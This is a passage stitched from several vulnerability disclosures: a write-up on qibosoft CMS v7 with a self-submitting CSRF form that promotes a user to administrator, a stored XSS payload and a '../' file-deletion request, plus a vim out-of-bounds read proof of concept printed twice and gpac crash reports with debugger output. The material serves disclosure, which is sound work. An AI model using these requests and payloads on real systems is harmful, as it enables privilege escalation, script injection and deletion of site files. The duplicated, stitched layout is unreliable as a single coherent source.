    Cookie: USR=faol4ey2%096%091571798905%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fdo%2Fregfield.php%3Fjob%3Dreg%26uid%3D2%260.20012388446694007; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%203%2C%20%22expires%22%3A%201571799269555%7D; __51cke__=; __51laig__=43; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=CDtWAVhaCDkAVQwCWgdXB1ZQWAdUB1BQVFVZA1cOAlVbCg9XVlVfCQ%3D%3D8991c7cf95
    Upgrade-Insecure-Requests: 1
    
    postdb%5Busername%5D=axin&postdb%5Bpassword%5D=5f4dcc3b5aa765d61d8327deb882cf99&postdb%5Bnewpassword%5D=&postdb%5Bgroupid%5D=3&ConfigDB%5Bendtime%5D=&postdb%5Bemail%5D=770284144%40qq.com&postdb%5Bicon%5D=&picWidth=150&picHeight=150&postdb%5Bmoney%5D=5&postdb%5Btotalspace%5D=0&postdb%5Boltime%5D=13226&postdb%5Bsex%5D=0&postdb%5Byz%5D=1&postdb%5Bintroduce%5D=&postdb%5Boicq%5D=&postdb%5Bmsn%5D=&postdb%5Bhomepage%5D=&postdb%5Baddress%5D=&postdb%5Bpostalcode%5D=&postdb%5Btelephone%5D=&postdb%5Bmobphone%5D=&postdb%5Bidcard%5D=&postdb%5Btruename%5D=&email_yz=0&mob_yz=0&idcard_yz=0&Submit=%E4%BF%AE+%E6%94%B9&uid=2&postdb%5Bhits%5D2=2
    

then, we can generate a csrf poc by burpsuite:

    <html>
    
    <body>
    <script>history.pushState('', '', '/')</script>
    <form id="csrf" action="http://localhost:8123/qibo7/admin/index.php?lfj=member&action=editmember" method="POST">
        <input type="hidden" name="postdb&#91;username&#93;" value="axin" />
        <input type="hidden" name="postdb&#91;password&#93;" value="5f4dcc3b5aa765d61d8327deb882cf99" />
        <input type="hidden" name="postdb&#91;newpassword&#93;" value="" />
        <input type="hidden" name="postdb&#91;groupid&#93;" value="3" />
        <input type="hidden" name="ConfigDB&#91;endtime&#93;" value="" />
        <input type="hidden" name="postdb&#91;email&#93;" value="770284144&#64;qq&#46;com" />
        <input type="hidden" name="postdb&#91;icon&#93;" value="" />
        <input type="hidden" name="picWidth" value="150" />
        <input type="hidden" name="picHeight" value="150" />
        <input type="hidden" name="postdb&#91;money&#93;" value="5" />
        <input type="hidden" name="postdb&#91;totalspace&#93;" value="0" />
        <input type="hidden" name="postdb&#91;oltime&#93;" value="13226" />
        <input type="hidden" name="postdb&#91;sex&#93;" value="0" />
        <input type="hidden" name="postdb&#91;yz&#93;" value="1" />
        <input type="hidden" name="postdb&#91;introduce&#93;" value="" />
        <input type="hidden" name="postdb&#91;oicq&#93;" value="" />
        <input type="hidden" name="postdb&#91;msn&#93;" value="" />
        <input type="hidden" name="postdb&#91;homepage&#93;" value="" />
        <input type="hidden" name="postdb&#91;address&#93;" value="" />
        <input type="hidden" name="postdb&#91;postalcode&#93;" value="" />
        <input type="hidden" name="postdb&#91;telephone&#93;" value="" />
        <input type="hidden" name="postdb&#91;mobphone&#93;" value="" />
        <input type="hidden" name="postdb&#91;idcard&#93;" value="" />
        <input type="hidden" name="postdb&#91;truename&#93;" value="" />
        <input type="hidden" name="email&#95;yz" value="0" />
        <input type="hidden" name="mob&#95;yz" value="0" />
        <input type="hidden" name="idcard&#95;yz" value="0" />
        <input type="hidden" name="Submit" value="ä&#191;&#174;&#32;æ&#148;&#185;" />
        <input type="hidden" name="uid" value="2" />
        <input type="hidden" name="postdb&#91;hits&#93;2" value="2" />
        <input type="submit" value="Submit request" />
    </form>
    <script>
        var poc = document.getElementById("csrf");
        poc.submit()
    </script>
    </body>
    </html>
    

the poc is to change user “axin” to administrator, if you want to reproduce the attack, you should register a common user first, and then generate csrf poc yourself.

from the picture below , we can see that the user axin is just a common user.  
![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023121948917.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

but after the admin click the evil url, the user axin will be admin !!

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023122628335.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

**0x03 Stored XSS in background**

position:/admin/index.php?lfj=friendlink&action=add  
request:

    POST /qibo7/admin/index.php?lfj=friendlink&action=add HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 283
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=friendlink&job=add
    Cookie: USR=faol4ey2%091%091571805064%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fadmin%2Findex.php%3Flfj%3Dfriendlink%26job%3Dadd; __tins__20133593=%7B%22sid%22%3A%201571802713278%2C%20%22vd%22%3A%204%2C%20%22expires%22%3A%201571805446751%7D; __51cke__=; __51laig__=47; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=CDtWAVhaCDkAVQwCWgdXB1ZQWAdUB1BQVFVZA1cOAlVbCg9XVlVfCQ%3D%3D8991c7cf95
    Upgrade-Insecure-Requests: 1
    
    postdb%5Bname%5D=axin&postdb%5Bfid%5D=2&postdb%5Burl%5D=%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E&postdb%5Blogo%5D=&postdb%5Bdescrip%5D=&postdb%5Bifhide%5D=0&postdb%5Byz%5D=1&postdb%5Biswordlink%5D=0&postdb%5Bendtime%5D=&Submit=%E6%8F%90%E4%BA%A4%E6%95%B0%E6%8D%AE&id=
    

No dangerous characters are escaped， so we can insert our payload like below:  
`"><script>alert(1);</script>`  
![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023123225890.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023123328491.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)  
![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023123459678.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)  
of course, we can also combine the xss with the csrf to do more !

**0x04 Arbitrary File Deletion in background**

position:/admin/index.php?lfj=mysql&action=del

poc:

    POST /qibo7/admin/index.php?lfj=mysql&action=del HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 63
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=mysql&job=del
    Cookie: USR=faol4ey2%091%091571799626%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fadmin%2Findex.php%3Flfj%3Dmysql%26job%3Ddel; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%203%2C%20%22expires%22%3A%201571799269555%7D; __51cke__=; __51laig__=43; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Admin=2%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=V29XS10LbVNSA1EBBgNVBwBXUQQNXQEBVF4GBVNcUlZdXgRQUlxd14a26ee802
    Upgrade-Insecure-Requests: 1
    
    baktime=../test.php&Submit=%E5%88%A0%E9%99%A4%E6%95%B0%E6%8D%AE
    

![在这里插入图片描述](https://img-blog.csdnimg.cn/2019102312471024.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

The problem occurred when the backup database was deleted， we can control the parameter “baktime”, and we can use `../` to achieve directory traversal purpose, so we can delete some web pages.I will show you details next.

firstly, create a file named `axin.php` in the root path of the application like below

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023125214905.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

and then send our payload

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023125423596.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

now, the file `axin.php` created just now has been deleted!

![在这里插入图片描述](https://img-blog.csdnimg.cn/2019102312545969.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

of course, we can also combine the vul with csrf to do more !

![在这里插入图片描述](https://img-blog.csdnimg.cn/20200708212341789.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70#pic_center)

CVE-2020-20946: some vulnerabilities in qibosoft(齐博CMS整站系统v7)_一个安全研究员-CSDN博客

**Description**

A heap-based OOB read of size 4 occurs when a user tries to open a vim session file specified below. This happens regarless of any command line options that could be specified to restrict vim, such -Z and -m. This bug has been found on default vim build in Ubuntu 20.04 for x86\_64/amd64.

**Proof of Concept****Steps to reproduce:**

1.  Clone the repo and build with ASAN.
    
2.  Recreate POC session:
    

    echo -ne "MDAwMDAwbjAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgMDAwMDAwMCAwMDAwMCAwIDAwMDAwMDAgMDAwCmF1ISogMCBuMAphbA==" | base64 -d >  min_read_4
    

Its content is:

    000000n0000000000000000000000000000000000000000000000 0000000 00000 0 0000000 000
    au!* 0 n0
    

3.  Load session:

    ./vim -u NONE -i NONE -n -X -Z -e -m -s -S ./min_read_4 -c ':qa!'
    

Sanitizer output:

    =================================================================
    ==4102472==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6070000003f8 at pc 0x00000049228a bp 0x7ffeb530bdd0 sp 0x7ffeb530bdc8
    READ of size 4 at 0x6070000003f8 thread T0
        #0 0x492289 in alist_name /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:877:30
        #1 0x492289 in do_arg_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1138:23
        #2 0x492289 in ex_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1188:5
        #3 0xcbcf56 in do_one_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:2572:2
        #4 0xcbcf56 in do_cmdline /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:994:17
        #5 0x1eb3e64 in do_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:1420:5
        #6 0x1ed7c97 in cmd_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:985:14
        #7 0x1ed7c97 in ex_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:1011:2
        #8 0xcbcf56 in do_one_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:2572:2
        #9 0xcbcf56 in do_cmdline /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:994:17
        #10 0x2e24e95 in do_cmdline_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:588:12
        #11 0x2e24e95 in exe_commands /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:3084:2
        #12 0x2e24e95 in vim_main2 /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:775:6
        #13 0x2e13f06 in main /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:426:12
        #14 0x7ff4cc80f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #15 0x3aa0bd in _start (/home/octa/fuzzing_vim/vim_laf_asan/src/vim+0x3aa0bd)
    
    0x6070000003f8 is located 8 bytes to the right of 80-byte region [0x6070000003a0,0x6070000003f0)
    allocated by thread T0 here:
        #0 0x424449 in realloc (/home/octa/fuzzing_vim/vim_laf_asan/src/vim+0x424449)
        #1 0x45fe4d in ga_grow_inner /home/octa/fuzzing_vim/vim_laf_asan/src/alloc.c:735:10
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:877:30 in alist_name
    Shadow bytes around the buggy address:
      0x0c0e7fff8020: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fd fd
      0x0c0e7fff8030: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
      0x0c0e7fff8040: fd fd fd fd fd fa fa fa fa fa fd fd fd fd fd fd
      0x0c0e7fff8050: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd
      0x0c0e7fff8060: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd
    =>0x0c0e7fff8070: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa[fa]
      0x0c0e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==4102472==ABORTING
    

**Impact**

This vulnerability is capable disclosing data and might lead to bypass protection mechanisms facilitating successful exploitation of other memory corruption vulnerabilities that may lead to code execution.

**Acknowledgements**

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

CVE-2021-4166: Out-of-bounds Read in vim

**Description**

A heap-based OOB read of size 4 occurs when a user tries to open a vim session file specified below. This happens regarless of any command line options that could be specified to restrict vim, such `-Z` and `-m`. This bug has been found on default vim build in Ubuntu 20.04 for x86\_64/amd64.

**Proof of Concept****Steps to reproduce:**

1.  Clone the repo and build with ASAN.
    
2.  Recreate POC session:
    

    echo -ne "MDAwMDAwbjAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgMDAwMDAwMCAwMDAwMCAwIDAwMDAwMDAgMDAwCmF1ISogMCBuMAphbA==" | base64 -d >  min_read_4
    

Its content is:

    000000n0000000000000000000000000000000000000000000000 0000000 00000 0 0000000 000
    au!* 0 n0
    

3.  Load session:

    ./vim -u NONE -i NONE -n -X -Z -e -m -s -S ./min_read_4 -c ':qa!'
    

Sanitizer output:

    =================================================================
    ==4102472==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6070000003f8 at pc 0x00000049228a bp 0x7ffeb530bdd0 sp 0x7ffeb530bdc8
    READ of size 4 at 0x6070000003f8 thread T0
        #0 0x492289 in alist_name /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:877:30
        #1 0x492289 in do_arg_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1138:23
        #2 0x492289 in ex_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1188:5
        #3 0xcbcf56 in do_one_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:2572:2
        #4 0xcbcf56 in do_cmdline /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:994:17
        #5 0x1eb3e64 in do_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:1420:5
        #6 0x1ed7c97 in cmd_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:985:14
        #7 0x1ed7c97 in ex_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:1011:2
        #8 0xcbcf56 in do_one_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:2572:2
        #9 0xcbcf56 in do_cmdline /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:994:17
        #10 0x2e24e95 in do_cmdline_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:588:12
        #11 0x2e24e95 in exe_commands /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:3084:2
        #12 0x2e24e95 in vim_main2 /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:775:6
        #13 0x2e13f06 in main /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:426:12
        #14 0x7ff4cc80f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #15 0x3aa0bd in _start (/home/octa/fuzzing_vim/vim_laf_asan/src/vim+0x3aa0bd)
    
    0x6070000003f8 is located 8 bytes to the right of 80-byte region [0x6070000003a0,0x6070000003f0)
    allocated by thread T0 here:
        #0 0x424449 in realloc (/home/octa/fuzzing_vim/vim_laf_asan/src/vim+0x424449)
        #1 0x45fe4d in ga_grow_inner /home/octa/fuzzing_vim/vim_laf_asan/src/alloc.c:735:10
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:877:30 in alist_name
    Shadow bytes around the buggy address:
      0x0c0e7fff8020: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fd fd
      0x0c0e7fff8030: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
      0x0c0e7fff8040: fd fd fd fd fd fa fa fa fa fa fd fd fd fd fd fd
      0x0c0e7fff8050: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd
      0x0c0e7fff8060: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd
    =>0x0c0e7fff8070: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa[fa]
      0x0c0e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==4102472==ABORTING
    

**Impact**

This vulnerability is capable disclosing data and might lead to bypass protection mechanisms facilitating successful exploitation of other memory corruption vulnerabilities that may lead to code execution.

**Acknowledgements**

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

Zoho ManageEngine ServiceDesk Plus before 12003 allows authentication bypass in certain admin configurations.

CVE-2021-44526: ServiceDesk Plus readme | Service desk release notes | ServiceDesk Plus latest version read me notes | IT service management release notes | Service desk current version

A null pointer dereference vulnerability exists in gpac 1.1.0 in the lsr_read_id.part function, which causes a segmentation fault and application crash.

CVE-2021-45260: Null Pointer Dereference in lsr_read_id.part() · Issue #1979 · gpac/gpac

A null pointer dereference vulnerability exists in gpac 1.1.0 via the lsr_read_anim_values_ex function, which causes a segmentation fault and application crash.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

A null pointer dereference was discovered in lsr\_read\_anim\_values\_ex(). The vulnerability causes a segmentation fault and application crash.

**Version:**

    MP4Box - GPAC version 1.1.0-DEV-rev1555-g339e7a736-master
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --prefix=/root/fuck_bin/gpac/test
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**command:**

lsr\_read\_anim\_values\_ex.part-lsr\_read\_animateTransform.zip

**Result**

lsr\_read\_anim\_values\_ex.part-lsr\_read\_animateTransform/id:000439,si  
g:11,src:004575+004803,op:splice,rep:2

     ../../test/lib/MP4Box -bt lsr_read_anim_values_ex.part-lsr_read_animateTransform/id:000439,si
    g:11,src:004575+004803,op:splice,rep:2
    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 853091
    [iso file] Incomplete file while reading for dump - aborting parsing
    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 853091
    [iso file] Incomplete file while reading for dump - aborting parsing
    MPEG-4 LASeR Scene Parsing
    [LASeR] memory overread - corrupted decoding
    [1]    1634950 segmentation fault  ../../test/lib/MP4Box -bt
    

**gdb**

lsr\_read\_anim\_values\_ex.part-lsr\_read\_animateTransform/id:000439,si  
g:11,src:004575+004803,op:splice,rep:2

    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7b551a6 in lsr_read_anim_values_ex.part () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
     RAX  0x0
     RBX  0x5
     RCX  0x5555555c6010 ◂— 0x70006
     RDX  0x6
     RDI  0x5555556e4020 ◂— 0x0
     RSI  0x1
     R8   0x5555556e4000 ◂— 0x0
     R9   0x0
     R10  0x7ffff7759e4a ◂— 'gf_list_insert'
     R11  0x206
     R12  0x5555555e1020 ◂— 0x54 /* 'T' */
     R13  0x5555556e4000 ◂— 0x0
     R14  0x5555555e35c0 —▸ 0x5555555e3630 ◂— 0x0
     R15  0x5555556e4020 ◂— 0x0
     RBP  0x3
     RSP  0x7fffffff6c90 ◂— 0xf00000003
     RIP  0x7ffff7b551a6 (lsr_read_anim_values_ex.part+1078) ◂— movss  xmm0, dword ptr [rax]
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
     ► 0x7ffff7b551a6 <lsr_read_anim_values_ex.part+1078>    movss  xmm0, dword ptr [rax]
       0x7ffff7b551aa <lsr_read_anim_values_ex.part+1082>    movss  dword ptr [r13 + 8], xmm0
       0x7ffff7b551b0 <lsr_read_anim_values_ex.part+1088>    call   gf_list_get@plt                <gf_list_get@plt>
    
       0x7ffff7b551b5 <lsr_read_anim_values_ex.part+1093>    test   rax, rax
       0x7ffff7b551b8 <lsr_read_anim_values_ex.part+1096>    je     lsr_read_anim_values_ex.part+1108                <lsr_read_anim_values_ex.part+1108>
    
       0x7ffff7b551ba <lsr_read_anim_values_ex.part+1098>    movss  xmm0, dword ptr [rax]
       0x7ffff7b551be <lsr_read_anim_values_ex.part+1102>    movss  dword ptr [r13], xmm0
       0x7ffff7b551c4 <lsr_read_anim_values_ex.part+1108>    mov    esi, 2
       0x7ffff7b551c9 <lsr_read_anim_values_ex.part+1113>    mov    rdi, r15
       0x7ffff7b551cc <lsr_read_anim_values_ex.part+1116>    call   gf_list_get@plt                <gf_list_get@plt>
    
       0x7ffff7b551d1 <lsr_read_anim_values_ex.part+1121>    test   rax, rax
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsp 0x7fffffff6c90 ◂— 0xf00000003
    01:0008│     0x7fffffff6c98 ◂— 0x7fff00000008
    02:0010│     0x7fffffff6ca0 ◂— 0x350000006e /* 'n' */
    03:0018│     0x7fffffff6ca8 —▸ 0x5555555e1020 ◂— 0x54 /* 'T' */
    04:0020│     0x7fffffff6cb0 ◂— 0x0
    05:0028│     0x7fffffff6cb8 —▸ 0x5555555e0f00 —▸ 0x5555555e0f20 —▸ 0x5555555e0f60 —▸ 0x5555555e0f40 ◂— ...
    06:0030│     0x7fffffff6cc0 ◂— 0x0
    07:0038│     0x7fffffff6cc8 ◂— 0x2748627e3b91600
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x7ffff7b551a6 lsr_read_anim_values_ex.part+1078
       f 1   0x7ffff7b5d9e8 lsr_read_animateTransform+424
       f 2   0x7ffff7b5beeb lsr_read_scene_content_model+1547
       f 3   0x7ffff7b5c89c lsr_read_group_content.part+316
       f 4   0x7ffff7b60a76 lsr_read_svg+838
       f 5   0x7ffff7b58817 lsr_read_command_list+759
       f 6   0x7ffff7b5ab74 lsr_decode_laser_unit+708
       f 7   0x7ffff7b6239d gf_laser_decode_command_list+333
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> bt
    #0  0x00007ffff7b551a6 in lsr_read_anim_values_ex.part () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #1  0x00007ffff7b5d9e8 in lsr_read_animateTransform () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #2  0x00007ffff7b5beeb in lsr_read_scene_content_model () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #3  0x00007ffff7b5c89c in lsr_read_group_content.part () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #4  0x00007ffff7b60a76 in lsr_read_svg () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #5  0x00007ffff7b58817 in lsr_read_command_list () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #6  0x00007ffff7b5ab74 in lsr_decode_laser_unit () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #7  0x00007ffff7b6239d in gf_laser_decode_command_list () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #8  0x00007ffff7aa3061 in gf_sm_load_run_isom () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #9  0x00005555555844a8 in dump_isom_scene ()
    #10 0x000055555557b42c in mp4boxMain ()
    #11 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe1c8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1b8) at ../csu/libc-start.c:308
    #12 0x000055555556c45e in _start ()

CVE-2021-45266: Null Pointer Dereference in lsr_read_anim_values_ex() · Issue #1985 · gpac/gpac

